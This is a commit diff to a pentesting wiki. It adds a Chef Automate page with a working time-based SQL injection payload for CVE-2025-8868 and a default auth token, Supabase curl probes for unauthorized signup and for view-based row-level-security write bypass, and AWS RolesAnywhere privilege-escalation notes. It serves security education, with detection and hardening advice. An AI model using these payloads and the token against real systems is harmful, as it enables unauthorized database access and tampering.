f

Author: carlospolop

src/SUMMARY.md

@@ -46,8 +46,10 @@
   - [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md)
 - [Serverless.com Security](pentesting-ci-cd/serverless.com-security.md)
 - [Supabase Security](pentesting-ci-cd/supabase-security.md)
-- [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md)
+- [Check Automate Security](pentesting-ci-cd/chef-automate-security/README.md)
+  - [Chef Automate Enumeration And Attacks](pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md)
 - [Vercel Security](pentesting-ci-cd/vercel-security.md)
+- [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md)
 - [TODO](pentesting-ci-cd/todo.md)
 
 # ⛈️ Pentesting Cloud
@@ -404,6 +406,7 @@
     - [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md)
 - [Azure Pentesting](pentesting-cloud/azure-security/README.md)
   - [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md)
+    - [Az Federation Abuse](pentesting-cloud/azure-security/az-basic-information/az-federation-abuse.md)
     - [Az - Tokens & Public Applications](pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md)
   - [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md)
   - [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md)

src/pentesting-ci-cd/chef-automate-security/README.md

@@ -0,0 +1,18 @@
+# Chef Automate Security
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## What is Chef Automate
+
+Chef Automate is a platform for infrastructure automation, compliance, and application delivery. It exposes a web UI (often Angular) that talks to backend gRPC services via a gRPC-Gateway, providing REST-like endpoints under paths such as /api/v0/.
+
+- Common backend components: gRPC services, PostgreSQL (often visible via pq: error prefixes), data-collector ingest service
+- Auth mechanisms: user/API tokens and a data collector token header x-data-collector-token
+
+## Enumeration & Attacks
+
+{{#ref}}
+chef-automate-enumeration-and-attacks.md
+{{#endref}}
+
+{{#include ../../banners/hacktricks-training.md}}

src/pentesting-ci-cd/chef-automate-security/chef-automate-enumeration-and-attacks.md

@@ -0,0 +1,150 @@
+# Chef Automate Enumeration & Attacks
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Overview
+
+This page collects practical techniques to enumerate and attack Chef Automate instances, with emphasis on:
+- Discovering gRPC-Gateway-backed REST endpoints and inferring request schemas via validation/error responses
+- Abusing the x-data-collector-token authentication header when defaults are present
+- Time-based blind SQL injection in the Compliance API (CVE-2025-8868) affecting the filters[].type field in /api/v0/compliance/profiles/search
+
+> Note: Backend responses that include header grpc-metadata-content-type: application/grpc typically indicate a gRPC-Gateway bridging REST calls to gRPC services.
+
+## Recon: Architecture and Fingerprints
+
+- Front-end: Often Angular. Static bundles can hint at REST paths (e.g., /api/v0/...)
+- API transport: REST to gRPC via gRPC-Gateway
+  - Responses may include grpc-metadata-content-type: application/grpc
+- Database/driver fingerprints:
+  - Error bodies starting with pq: strongly suggest PostgreSQL with the Go pq driver
+- Interesting Compliance endpoints (auth required):
+  - POST /api/v0/compliance/profiles/search
+  - POST /api/v0/compliance/scanner/jobs/search
+
+## Auth: Data Collector Token (x-data-collector-token)
+
+Chef Automate exposes a data collector that authenticates requests via a dedicated header:
+
+- Header: x-data-collector-token
+- Risk: Some environments may retain a default token granting access to protected API routes. Known default observed in the wild:
+  - 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
+
+If present, this token can be used to call Compliance API endpoints otherwise gated by auth. Always attempt to rotate/disable defaults during hardening.
+
+## API Schema Inference via Error-Driven Discovery
+
+gRPC-Gateway-backed endpoints often leak useful validation errors that describe the expected request model.
+
+For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with:
+
+- type: string (filter field identifier)
+- values: array of strings
+
+Example request shape:
+
+```json
+{
+  "filters": [
+    { "type": "name", "values": ["test"] }
+  ]
+}
+```
+
+Malformed JSON or wrong field types typically trigger 4xx/5xx with hints, and headers indicate the gRPC-Gateway behavior. Use these to map fields and localize injection surfaces.
+
+## Compliance API SQL Injection (CVE-2025-8868)
+
+- Affected endpoint: POST /api/v0/compliance/profiles/search
+- Injection point: filters[].type
+- Vulnerability class: time-based blind SQL injection in PostgreSQL
+- Root cause: Lack of proper parameterization/whitelisting when interpolating the type field into a dynamic SQL fragment (likely used to construct identifiers/WHERE clauses). Crafted values in type are evaluated by PostgreSQL.
+
+Working time-based payload:
+
+```json
+{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
+```
+
+Technique notes:
+- Close the original string with a single quote
+- Concatenate a subquery that calls pg_sleep(N)
+- Re-enter string context via || so the final SQL remains syntactically valid regardless of where type is embedded
+
+### Proof via differential latency
+
+Send paired requests and compare response times to validate server-side execution:
+
+- N = 1 second
+
+```
+POST /api/v0/compliance/profiles/search HTTP/1.1
+Host: <target>
+Content-Type: application/json
+x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
+
+{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]}
+```
+
+- N = 5 seconds
+
+```
+POST /api/v0/compliance/profiles/search HTTP/1.1
+Host: <target>
+Content-Type: application/json
+x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
+
+{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
+```
+
+Observed behavior:
+- Response times scale with pg_sleep(N)
+- HTTP 500 responses may include pq: details during probing, confirming SQL execution paths
+
+> Tip: Use a timing validator (e.g., multiple trials with statistical comparison) to reduce noise and false positives.
+
+### Impact
+
+Authenticated users—or unauthenticated actors abusing a default x-data-collector-token—can execute arbitrary SQL within Chef Automate’s PostgreSQL context, risking confidentiality and integrity of compliance profiles, configuration, and telemetry.
+
+### Affected versions / Fix
+
+- CVE: CVE-2025-8868
+- Upgrade guidance: Chef Automate 4.13.295 or later (Linux x86) per vendor advisories
+
+## Detection and Forensics
+
+- API layer:
+  - Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep
+  - Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows
+- Database layer (PostgreSQL):
+  - Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver)
+- Authentication:
+  - Log and alert on usage of x-data-collector-token, especially known default values, across API paths
+
+## Mitigations and Hardening
+
+- Immediate:
+  - Rotate/disable default data collector tokens
+  - Restrict ingress to data collector endpoints; enforce strong, unique tokens
+- Code-level:
+  - Parameterize queries; never string-concatenate SQL fragments
+  - Strictly whitelist allowed type values on the server (enum)
+  - Avoid dynamic SQL assembly for identifiers/clauses; if dynamic behavior is required, use safe identifier quoting and explicit whitelists
+
+## Practical Testing Checklist
+
+- Check if x-data-collector-token is accepted and whether the known default works
+- Map the Compliance API request schema by inducing validation errors and reading error messages/headers
+- Test for SQLi in less obvious “identifier-like” fields (e.g., filters[].type), not just values arrays or top-level text fields
+- Use time-based techniques with concatenation to keep SQL syntactically valid across contexts
+
+## References
+
+- [Cooking an SQL Injection Vulnerability in Chef Automate (XBOW blog)](https://xbow.com/blog/cooking-an-sql-injection-vulnerability-in-chef-automate)
+- [Timing trace (XBOW)](https://xbow-website.pages.dev/traces/chef-automate-sql-injection/)
+- [CVE-2025-8868](https://www.cve.org/CVERecord?id=CVE-2025-8868)
+- [gRPC-Gateway](https://github.com/grpc-ecosystem/grpc-gateway)
+- [pq PostgreSQL driver for Go](https://github.com/lib/pq)
+
+{{#include ../../banners/hacktricks-training.md}}

src/pentesting-ci-cd/github-security/abusing-github-actions/README.md

@@ -480,14 +480,18 @@ jobs:
       - run: ls tmp/checkout
 ```
 
-### Accessing AWS and GCP via OIDC
+### Accessing AWS, Azure and GCP via OIDC
 
 Check the following pages:
 
 {{#ref}}
 ../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
 {{#endref}}
 
+{{#ref}}
+../../../pentesting-cloud/azure-security/az-basic-information/az-federation-abuse.md
+{{#endref}}
+
 {{#ref}}
 ../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
 {{#endref}}

src/pentesting-ci-cd/supabase-security.md

@@ -127,6 +127,114 @@ This is a very bad idea because supabase charges per active user so people could
 
 <figure><img src="../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
+#### Auth: Server-side signup enforcement
+
+Hiding the signup button in the frontend is not enough. If the **Auth server still allows signups**, an attacker can call the API directly with the public `anon` key and create arbitrary users.
+
+Quick test (from an unauthenticated client):
+
+```bash
+curl -X POST \
+  -H "apikey: <SUPABASE_ANON_KEY>" \
+  -H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
+  -H "Content-Type: application/json" \
+  -d '{"email":"attacker@example.com","password":"Sup3rStr0ng!"}' \
+  https://<PROJECT_REF>.supabase.co/auth/v1/signup
+```
+
+Expected hardening:
+- Disable email/password signups in the Dashboard: Authentication → Providers → Email → Disable sign ups (invite-only), or set the equivalent GoTrue setting.
+- Verify the API now returns 4xx to the previous call and no new user is created.
+- If you rely on invites or SSO, ensure all other providers are disabled unless explicitly needed.
+
+## RLS and Views: Write bypass via PostgREST
+
+Using a Postgres VIEW to “hide” sensitive columns and exposing it via PostgREST can change how privileges are evaluated. In PostgreSQL:
+- Ordinary views execute with the privileges of the view owner by default (definer semantics). In PG ≥15 you can opt into `security_invoker`.
+- Row Level Security (RLS) applies on base tables. Table owners bypass RLS unless `FORCE ROW LEVEL SECURITY` is set on the table.
+- Updatable views can accept INSERT/UPDATE/DELETE that are then applied to the base table. Without `WITH CHECK OPTION`, writes that don’t match the view predicate may still succeed.
+
+Risk pattern observed in the wild:
+- A reduced-column view is exposed through Supabase REST and granted to `anon`/`authenticated`.
+- PostgREST allows DML on the updatable view and the operation is evaluated with the view owner’s privileges, effectively bypassing the intended RLS policies on the base table.
+- Result: low-privileged clients can mass-edit rows (e.g., profile bios/avatars) they should not be able to modify.
+
+Illustrative write via view (attempted from a public client):
+
+```bash
+curl -X PATCH \
+  -H "apikey: <SUPABASE_ANON_KEY>" \
+  -H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
+  -H "Content-Type: application/json" \
+  -H "Prefer: return=representation" \
+  -d '{"bio":"pwned","avatar_url":"https://i.example/pwn.png"}' \
+  "https://<PROJECT_REF>.supabase.co/rest/v1/users_view?id=eq.<victim_user_id>"
+```
+
+Hardening checklist for views and RLS:
+- Prefer exposing base tables with explicit, least-privilege grants and precise RLS policies.
+- If you must expose a view:
+  - Make it non-updatable (e.g., include expressions/joins) or deny `INSERT/UPDATE/DELETE` on the view to all untrusted roles.
+  - Enforce `ALTER VIEW <v> SET (security_invoker = on)` so the invoker’s privileges are used instead of the owner’s.
+  - On base tables, use `ALTER TABLE <t> FORCE ROW LEVEL SECURITY;` so even owners are subject to RLS.
+  - If allowing writes via an updatable view, add `WITH [LOCAL|CASCADED] CHECK OPTION` and complementary RLS on base tables to ensure only allowed rows can be written/changed.
+- In Supabase, avoid granting `anon`/`authenticated` any write privileges on views unless you have verified end-to-end behavior with tests.
+
+Detection tip:
+- From `anon` and an `authenticated` test user, attempt all CRUD operations against every exposed table/view. Any successful write where you expected denial indicates a misconfiguration.
+
+### OpenAPI-driven CRUD probing from anon/auth roles
+
+PostgREST exposes an OpenAPI document that you can use to enumerate all REST resources, then automatically probe allowed operations from low-privileged roles.
+
+Fetch the OpenAPI (works with the public anon key):
+
+```bash
+curl -s https://<PROJECT_REF>.supabase.co/rest/v1/ \
+  -H "apikey: <SUPABASE_ANON_KEY>" \
+  -H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
+  -H "Accept: application/openapi+json" | jq '.paths | keys[]'
+```
+
+Probe pattern (examples):
+- Read a single row (expect 401/403/200 depending on RLS):
+```bash
+curl -s "https://<PROJECT_REF>.supabase.co/rest/v1/<table>?select=*&limit=1" \
+  -H "apikey: <SUPABASE_ANON_KEY>" \
+  -H "Authorization: Bearer <SUPABASE_ANON_KEY>"
+```
+- Test UPDATE is blocked (use a non-existing filter to avoid altering data during testing):
+```bash
+curl -i -X PATCH \
+  -H "apikey: <SUPABASE_ANON_KEY>" \
+  -H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
+  -H "Content-Type: application/json" \
+  -H "Prefer: return=minimal" \
+  -d '{"__probe":true}' \
+  "https://<PROJECT_REF>.supabase.co/rest/v1/<table_or_view>?id=eq.00000000-0000-0000-0000-000000000000"
+```
+- Test INSERT is blocked:
+```bash
+curl -i -X POST \
+  -H "apikey: <SUPABASE_ANON_KEY>" \
+  -H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
+  -H "Content-Type: application/json" \
+  -H "Prefer: return=minimal" \
+  -d '{"__probe":true}' \
+  "https://<PROJECT_REF>.supabase.co/rest/v1/<table_or_view>"
+```
+- Test DELETE is blocked:
+```bash
+curl -i -X DELETE \
+  -H "apikey: <SUPABASE_ANON_KEY>" \
+  -H "Authorization: Bearer <SUPABASE_ANON_KEY>" \
+  "https://<PROJECT_REF>.supabase.co/rest/v1/<table_or_view>?id=eq.00000000-0000-0000-0000-000000000000"
+```
+
+Recommendations:
+- Automate the previous probes for both `anon` and a minimally `authenticated` user and integrate them in CI to catch regressions.
+- Treat every exposed table/view/function as a first-class surface. Don’t assume a view “inherits” the same RLS posture as its base tables.
+
 ### Passwords & sessions
 
 It's possible to indicate the minimum password length (by default), requirements (no by default) and disallow to use leaked passwords.\
@@ -160,7 +268,13 @@ It's possible to set an SMTP to send emails.
 
 It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly).
 
-{{#include ../banners/hacktricks-training.md}}
-
+## References
 
+- [Building Hacker Communities: Bug Bounty Village, getDisclosed’s Supabase Misconfig, and the LHE Squad (Ep. 133) – YouTube](https://youtu.be/NI-eXMlXma4)
+- [Critical Thinking Podcast – Episode 133 page](https://www.criticalthinkingpodcast.io/episode-133-building-hacker-communities-bug-bounty-village-getdisclosed-and-the-lhe-squad/)
+- [Supabase: Row Level Security (RLS)](https://supabase.com/docs/guides/auth/row-level-security)
+- [PostgreSQL: Row Security Policies](https://www.postgresql.org/docs/current/ddl-rowsecurity.html)
+- [PostgreSQL: CREATE VIEW (security_invoker, check option)](https://www.postgresql.org/docs/current/sql-createview.html)
+- [PostgREST: OpenAPI documentation](https://postgrest.org/en/stable/references/api.html#openapi-documentation)
 
+{{#include ../banners/hacktricks-training.md}}

src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md

@@ -100,6 +100,10 @@ aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/
 
 AWS IAM RolesAnywhere allows workloads outside AWS to assume IAM roles using X.509 certificates. But when trust policies aren't properly scoped, they can be abused for privilege escalation.
 
+To understand this attack, it is necessary to explain what a trust anchor is. A trust anchor in AWS IAM Roles Anywhere is the root of trust entity, it contains the public certificate of a Certificate Authority (CA) that is registered in the account so that AWS can validate the presented X.509 certificates. In this way, if the client certificate was issued by that CA and the trust anchor is active, AWS recognizes it as valid.
+
+In addition, a profile is the configuration that defines which attributes of the X.509 certificate (such as CN, OU, or SAN) will be transformed into session tags, and these tags will later be compared against the conditions of the trust policy.
+
 This policy lacks restrictions on which trust anchor or certificate attributes are allowed. As a result, any certificate tied to any trust anchor in the account can be used to assume this role.
 
 ```json
@@ -135,11 +139,11 @@ aws_signing_helper credential-process \
   --role-arn arn:aws:iam::123456789012:role/Admin
 ```
 
-The trust anchor validates that the client certificate `readonly.pem` comes from its authorized CA, when the trust anchor was created the CA’s public certificate was included (and now used to validate `readonly.pem`). Inside `readonly.pem` is the public key, which AWS uses to verify that the signature was made with its corresponding private key `readonly.key`.
+The trust anchor validates that the client’s `readonly.pem` certificate comes from its authorized CA, and within this `readonly.pem` certificate is the public key that AWS uses to verify that the signature was made with its corresponding private key `readonly.key`.
 
-The certificate also proves identity and provides attributes (such as CN or OU) that the `default` profile transforms into tags, which the role’s trust policy can use to decide whether to authorize access, if there are no conditions in the trust policy, those tags are ignored and anyone with a valid certificate is allowed through.
+The certificate also provides attributes (such as CN or OU) that the `default` profile transforms into tags, which the role’s trust policy can use to decide whether to authorize access. If there are no conditions in the trust policy, those tags have no use, and access is granted to anyone with a valid certificate.
 
-For this attack to be possible, both the trust anchor and the default profile must be active.
+For this attack to be possible, both the trust anchor and the `default` profile must be active.
 
 ### References